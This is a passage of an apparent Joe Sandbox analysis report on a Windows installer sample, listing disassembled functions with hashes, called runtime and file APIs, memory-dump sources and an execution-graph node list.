                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: a60e8d51c1fedd4886fdd55b54804f5b15b999714123d8c932266ba882d03638
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: 90819231D01159DFCF15DFA8C990ADEBBB4AF19318F10409AE51277BA0EB34AE49CB60
                            Function 6CB028E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6CB02A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: cd15c5ac5149c876a2fb10845719cf5796873d312bcf362b386de7e5439725c4
                            • Instruction ID: c8f4c4b146943840010e380707013181001a2fe2bead1d04a8dce6381d515999
                            • Opcode Fuzzy Hash: cd15c5ac5149c876a2fb10845719cf5796873d312bcf362b386de7e5439725c4
                            • Instruction Fuzzy Hash: D35122B1A00244CFCB10CF68D885A9EBBB5EF89304F14856EE849DB741E735D999CB92
                            Function 6CC92F9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: <dJ$Q
                            • API String ID: 3519838083-2252229148
                            • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                            • Instruction ID: bec8d1885abca444fcf320d9843d45e8ee9ebcbda5b2cf56472ecc132ce1608f
                            • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                            • Instruction Fuzzy Hash: 02518171904249EFCF01DFD9C9808EDB7B1FF48318F18852DE515ABA50E7319A8ACB51
                            Function 6CC8E9B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $D^J
                            • API String ID: 3519838083-3977321784
                            • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                            • Instruction ID: a881ae4fa284b53d52912c2d2c0d5374c215a347b13b76126cc6ec2f77a01da3
                            • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                            • Instruction Fuzzy Hash: F8412C28A075A06EDB269F29C4907FBBFA1AF1760CF14815DC49207EC1FB6859CAC7D4
                            Function 6CC505EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CC57DC6), ref: 6CC5070B
                            • __dosmaperr.LIBCMT ref: 6CC50712
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            • Opcode ID: fe94687a93007a4df33bac2fdc094786255ba516f63f6d19503c3a3413849693
                            • Instruction ID: ce91fa115c6f968e71bfad82f60c11008b1edfefc0bc860699c67ebde09277bf
                            • Opcode Fuzzy Hash: fe94687a93007a4df33bac2fdc094786255ba516f63f6d19503c3a3413849693
                            • Instruction Fuzzy Hash: 5B4158716045D4AFD7118F19C880BA97FA9EB8635CF988259EC84CB682F771D832CB94
                            Function 6CCA812C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: X&L$p|J
                            • API String ID: 3519838083-2944591232
                            • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                            • Instruction ID: 0e66f38c2c57b06926bfeeb9d0624a238531600fbd53489e1f3bc09b5d10fc9d
                            • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                            • Instruction Fuzzy Hash: D13126316859878BDB009BD9D94DFB97B71FB11728F200227D500E2EA2FB6089878B50
                            Function 6CCA7C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: 3324150d2f267dca043469d17f9394a6bb598250aa7d12a09fe2518c526e1260
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: A8419F31A01786EFCF119FA5C5946FEBBE2FF45308F00446EE05A97A50EB31690ADB91
                            Function 6CCAACB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID: 3333
                            • API String ID: 3732870572-2924271548
                            • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction ID: 24c6b89a09c63e2b3e724a369c529997bc632292c9f02ab9d113b5787a1aba16
                            • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction Fuzzy Hash: DA2194B0E007046ED720CFB98884A5BFAFCEB84755F10896EE186D7A40D770A9458B65
                            Function 6CCA3906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: d90379db6d71bc226563e245a5d55c0a70f4a5e57aa491bfd6c729942faffb2b
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: CD01AD72E0130ADACB10CFE984945AEFBB4FF59304F44842EE029E3A40D3349905CBA9
                            Function 6CC7F0AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$xMJ
                            • API String ID: 3519838083-951924499
                            • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction ID: 85ffc0d653bc3122abe9fa53e1cc77557e089f2ea586152b2e13096c07e4f1b3
                            • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction Fuzzy Hash: 41112A71A01209DFCB10CFA9C49059EB7B5FF58348F90C46ED469E7650E3349A45CBA5
                            Function 6CC51418 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6CC51439
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CC4DD2A,?,00000004,?,4B42FCB6,?,?,6CC42E7C,4B42FCB6,?), ref: 6CC51475
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: 7743e3beb0c915530d23d59bd3b9366eaaf33bc5694315126c004cbe4945b96e
                            • Instruction ID: b8aea5c597c183382ea0eb42e3907098c2ec4efeb6bc0a11822f67343dedddd3
                            • Opcode Fuzzy Hash: 7743e3beb0c915530d23d59bd3b9366eaaf33bc5694315126c004cbe4945b96e
                            • Instruction Fuzzy Hash: FEF0C8316011116A9B111E2F9C48B9B3778AFC3BB9B95D115E81596E80FB20D435C199
                            Function 6CCA6431 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: |zJ
                            • API String ID: 3037903784-3782439380
                            • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction ID: 6cd44658c45dd86c661c3b4f902c41fe315ebf87cff0d06755ada57015a8fba9
                            • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction Fuzzy Hash: B1E0ED32A01A22AFEB04CF8DC808BDEF3A8FF54B18F10401F9012E3E40DBB0A8418681
                            Function 6CC9D143 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: <oJ
                            • API String ID: 3037903784-2791053824
                            • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction ID: e882d7b90152b9b3b722eb1e5e764bacc1b741634ef877cd6d30807a10575252
                            • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction Fuzzy Hash: 47E06D72A155109BDB049F4DD810BDEF7B9EF55B24F11411FA021A7B51DBB5E800C694
                            Function 6CCD24AB Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @ K$DJ$T)K$X/K
                            • API String ID: 0-3815299647
                            • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction ID: 6e48bec2dc61f67f10bf3e00b570b653302c7c31ab5eb190082e8a88f9a322a6
                            • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction Fuzzy Hash: 3B91C2306043059BCF24EE65C5B87EAB3A2AF4130CF124419CA655BF81FB75BD4AC761
                            Function 6CCC7E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction ID: 4542299a2f370ab38de0aa4c30c05e58e0fa4624eee564906039fba88fe567e2
                            • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction Fuzzy Hash: 82519071A042099BCF00DF96D980ADEB7B1FF1531CF10841AE81167E90FB75A949DBA2

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.3%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:31
                            execution_graph 73242 718eb1 73247 718ed1 73242->73247 73245 718ec9 73248 718edb __EH_prolog 73247->73248 73256 719267 73248->73256 73252 718efd 73261 70e5f1 free ctype 73252->73261 73254 718eb9 73254->73245 73255 6d1e40 free 73254->73255 73255->73245 73258 719271 __EH_prolog 73256->73258 73262 6d1e40 free 73258->73262 73259 718ef1 73260 71922b free CloseHandle GetLastError ctype 73259->73260 73260->73252 73261->73254 73262->73259 73263 705475 73268 6d2fec 73263->73268 73267 7054bb 73269 6d2ffc 73268->73269 73270 6d2ff8 73268->73270 73269->73270 73319 6d1e0c 73269->73319 73274 70c911 73270->73274 73275 70c926 GetTickCount 73274->73275 73276 70c92f 73274->73276 73275->73276 73285 70c96d 73276->73285 73305 70cb64 73276->73305 73350 6d2ab1 strcmp 73276->73350 73280 70c9ce 73280->73305 73333 6d27bb 73280->73333 73281 70c95b 73281->73285 73351 6d3542 wcscmp 73281->73351 73285->73305 73325 70c86a 73285->73325 73286 70ca0a 73287 70ca21 73286->73287 73289 6d286d 5 API calls 73286->73289 73293 6d286d 5 API calls 73287->73293 73313 70cb10 73287->73313 73288 70c9e2 73288->73286 73353 6d286d 73288->73353 73291 70ca16 73289->73291 73360 6d28fa malloc _CxxThrowException free memcpy _CxxThrowException 73291->73360 73297 70ca40 73293->73297 73301 6d2fec 3 API calls 73297->73301 73299 70cb59 73372 70cb92 malloc _CxxThrowException free 73299->73372 73304 70ca4e 73301->73304 73361 6d2033 73304->73361 73305->73267 73306 70cb50 73309 6d27bb 3 API calls 73306->73309 73307 70cb49 73371 6d1f91 fflush 73307->73371 73309->73299 73311 70caf5 73370 6d28fa malloc _CxxThrowException free memcpy _CxxThrowException 73311->73370 73339 70cb74 73313->73339 73314 6d2fec 3 API calls 73317 70ca6a 73314->73317 73317->73311 73317->73314 73318 6d2033 10 API calls 73317->73318 73368 6d3599 memmove 73317->73368 73369 6d3402 malloc _CxxThrowException free memmove _CxxThrowException 73317->73369 73318->73317 73320 6d1e1c malloc 73319->73320 73321 6d1e15 73319->73321 73322 6d1e3e 73320->73322 73323 6d1e2a _CxxThrowException 73320->73323 73321->73320 73324 6d1e40 free 73322->73324 73323->73322 73324->73270 73327 70c88c __aulldiv 73325->73327 73326 70c8d3 strlen 73328 70c900 73326->73328 73329 70c8f1 73326->73329 73327->73326 73330 6d28a1 5 API calls 73328->73330 73329->73328 73331 6d286d 5 API calls 73329->73331 73332 70c90c 73330->73332 73331->73329 73332->73280 73352 6d2ab1 strcmp 73332->73352 73334 6d27c7 73333->73334 73338 6d27e3 73333->73338 73335 6d1e0c ctype 2 API calls 73334->73335 73334->73338 73336 6d27da 73335->73336 73373 6d1e40 free 73336->73373 73338->73288 73340 70cb7c strcmp 73339->73340 73341 70cb1c 73339->73341 73340->73341 73341->73299 73342 70c7d7 73341->73342 73343 70c7ea 73342->73343 73346 70c849 73342->73346 73344 70c7fe fputs 73343->73344 73374 6d25cb malloc _CxxThrowException free _CxxThrowException ctype 73343->73374 73344->73346 73345 70c85a fputs 73345->73306 73345->73307 73346->73345 73375 6d1f91 fflush 73346->73375 73350->73281 73351->73285 73352->73280 73376 6d1e9d 73353->73376 73356 6d28a1 73357 6d28b0 73356->73357 73381 6d267f 73357->73381 73359 6d28bf 73359->73286 73360->73287 73362 6d203b 73361->73362 73363 6d2045 73362->73363 73364 6d2054 73362->73364 73391 6d421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 73363->73391 73392 6d37ff 9 API calls 73364->73392 73367 6d2052 73367->73317 73368->73317 73369->73317 73370->73313 73371->73306 73372->73305 73373->73338 73374->73344 73375->73345 73377 6d1ead 73376->73377 73378 6d1ea8 73376->73378 73377->73356 73380 6d263c malloc _CxxThrowException free memcpy _CxxThrowException 73378->73380 73380->73377 73382 6d26c2 73381->73382 73384 6d2693 73381->73384 73382->73359 73383 6d26c8 _CxxThrowException 73386 6d26dd 73383->73386 73384->73383 73385 6d26bc 73384->73385 73390 6d2595 malloc _CxxThrowException free memcpy ctype 73385->73390 73388 6d1e0c ctype 2 API calls 73386->73388 73389 6d26ea 73388->73389 73389->73359 73390->73382 73391->73367 73392->73367 73396 7569f0 free 73397 6e1368 73400 6e136d 73397->73400 73399 6e138c 73400->73399 73403 767d80 WaitForSingleObject 73400->73403 73406 70f745 73400->73406 73410 767ea0 SetEvent GetLastError 73400->73410 73404 767d8e GetLastError 73403->73404 73405 767d98 73403->73405 73404->73405 73405->73400 73407 70f74f __EH_prolog 73406->73407 73411 70f784 73407->73411 73409 70f765 73409->73400 73410->73400 73412 70f78e __EH_prolog 73411->73412 73420 6e12d4 73412->73420 73415 6e12d4 4 API calls 73416 70f7d4 73415->73416 73417 70f871 73416->73417 73428 6dc4d6 73416->73428 73434 756b23 VirtualAlloc 73416->73434 73417->73409 73421 6e1327 73420->73421 73422 6e12e7 73420->73422 73421->73415 73423 6e12ef _CxxThrowException 73422->73423 73424 6e1304 73422->73424 73423->73424 73435 6d1e40 free 73424->73435 73426 6e130b 73427 6d1e0c ctype 2 API calls 73426->73427 73427->73421 73432 6dc4e9 73428->73432 73429 6dc6f3 73429->73417 73432->73429 73433 6dc695 memmove 73432->73433 73436 6e111c 73432->73436 73441 6e11b4 73432->73441 73433->73432 73434->73417 73435->73426 73437 6e1130 73436->73437 73438 6e115f 73437->73438 73446 6dd331 73437->73446 73450 6db668 73437->73450 73438->73432 73443 6e11c1 73441->73443 73442 6e11eb 73442->73432 73443->73442 73486 71ae7c 73443->73486 73491 71af27 73443->73491 73447 6dd355 73446->73447 73448 6dd374 73447->73448 73449 6db668 10 API calls 73447->73449 73448->73437 73449->73448 73451 6db675 73450->73451 73455 6db6aa 73451->73455 73456 6db81b 73451->73456 73457 6db7e7 73451->73457 73460 6db811 73451->73460 73462 6db7ad 73451->73462 73467 6db864 73451->73467 73473 6d7731 73451->73473 73482 6d7b4f ReadFile 73451->73482 73454 6db8aa GetLastError 73454->73455 73455->73437 73456->73455 73459 6db839 memcpy 73456->73459 73461 6d7731 5 API calls 73457->73461 73457->73467 73459->73455 73483 6db8ec GetLastError 73460->73483 73463 6db80d 73461->73463 73462->73451 73468 6db8c7 73462->73468 73481 756a20 VirtualAlloc 73462->73481 73463->73460 73463->73467 73469 6d7b7c 73467->73469 73468->73455 73470 6d7b89 73469->73470 73484 6d7b4f ReadFile 73470->73484 73472 6d7b9a 73472->73454 73472->73455 73474 6d775c SetFilePointer 73473->73474 73476 6d7740 73473->73476 73475 6d7780 GetLastError 73474->73475 73480 6d77a1 73474->73480 73477 6d778c 73475->73477 73475->73480 73476->73474 73485 6d76d6 SetFilePointer GetLastError 73477->73485 73479 6d7796 SetLastError 73479->73480 73480->73451 73481->73462 73482->73451 73483->73455 73484->73472 73485->73479 73487 71ae86 73486->73487 73498 6e7140 73487->73498 73502 6e7190 73487->73502 73488 71aebb 73488->73443 73494 71af36 73491->73494 73492 71b010 73492->73443 73493 71aeeb 107 API calls 73493->73494 73494->73492 73494->73493 73603 6dbd0c 73494->73603 73608 71ad3a 73494->73608 73612 71aebf 107 API calls 73494->73612 73499 6e718d 73498->73499 73500 6e714b 73498->73500 73499->73488 73500->73499 73515 6e4dff 7 API calls 2 library calls 73500->73515 73503 6e719a __EH_prolog 73502->73503 73504 6e71b0 73503->73504 73507 6e71dd 73503->73507 73542 6e4d78 73504->73542 73516 6e6fc5 73507->73516 73508 6e72b4 73509 6e4d78 VariantClear 73508->73509 73510 6e72c0 73508->73510 73509->73510 73511 6e71b7 73510->73511 73512 6e7140 7 API calls 73510->73512 73511->73488 73512->73511 73513 6e72a3 SetFileSecurityW 73513->73508 73514 6e7236 73514->73508 73514->73511 73514->73513 73515->73499 73517 6e6fcf __EH_prolog 73516->73517 73545 6e44a6 73517->73545 73519 6e7029 73527 6e706a 73519->73527 73567 6e4dff 7 API calls 2 library calls 73519->73567 73525 6e709e 73572 6d1e40 free 73525->73572 73526 6e7051 73526->73527 73530 6e11b4 107 API calls 73526->73530 73548 6e68ac 73527->73548 73529 6e70c0 73568 6d6096 15 API calls 2 library calls 73529->73568 73530->73527 73531 6e712e 73531->73514 73533 6e70d1 73534 6e70e2 73533->73534 73569 6e4dff 7 API calls 2 library calls 73533->73569 73539 6e70e6 73534->73539 73570 6e6b5e 69 API calls 2 library calls 73534->73570 73537 6e70fd 73538 6e7103 73537->73538 73537->73539 73571 6d1e40 free 73538->73571 73539->73525 73541 6e710b 73541->73531 73592 6f9262 73542->73592 73573 6d2e04 73545->73573 73549 6e68b6 __EH_prolog 73548->73549 73552 6e6921 73549->73552 73564 6e68c5 73549->73564 73577 6d7d4b 73549->73577 73551 6e6962 73555 6e6998 73551->73555 73584 6d2dcd malloc _CxxThrowException 73551->73584 73552->73551 73552->73555 73583 6e6a17 6 API calls 2 library calls 73552->73583 73556 6e69e1 73555->73556 73576 6d7c3b SetFileTime 73555->73576 73587 6dbcf8 CloseHandle 73556->73587 73558 6e697a 73585 6e6b09 13 API calls __EH_prolog 73558->73585 73563 6e698c 73586 6d1e40 free 73563->73586 73564->73525 73564->73529 73566 6e6e71 12 API calls 2 library calls 73566->73519 73567->73526 73568->73533 73569->73534 73570->73537 73571->73541 73572->73531 73574 6d1e0c ctype 2 API calls 73573->73574 73575 6d2e11 73574->73575 73575->73519 73575->73527 73575->73566 73576->73556 73588 6d77c8 73577->73588 73579 6d7d76 73579->73552 73582 6e4dff 7 API calls 2 library calls 73579->73582 73582->73552 73583->73551 73584->73558 73585->73563 73586->73555 73587->73564 73589 6d7731 SetFilePointer GetLastError SetFilePointer GetLastError SetLastError 73588->73589 73590 6d77db 73589->73590 73590->73579 73591 6d7d3c SetEndOfFile 73590->73591 73591->73579 73593 6f926c __EH_prolog 73592->73593 73594 6f92fc 73593->73594 73597 6f92a4 73593->73597 73596 6d965d VariantClear 73594->73596 73598 6e4d91 73596->73598 73599 6d965d 73597->73599 73598->73511 73600 6d9685 73599->73600 73602 6d9665 73599->73602 73600->73598 73601 6d967e VariantClear 73601->73600 73602->73600 73602->73601 73613 6d7ca2 73603->73613 73606 6dbd3d 73606->73494 73609 71ad44 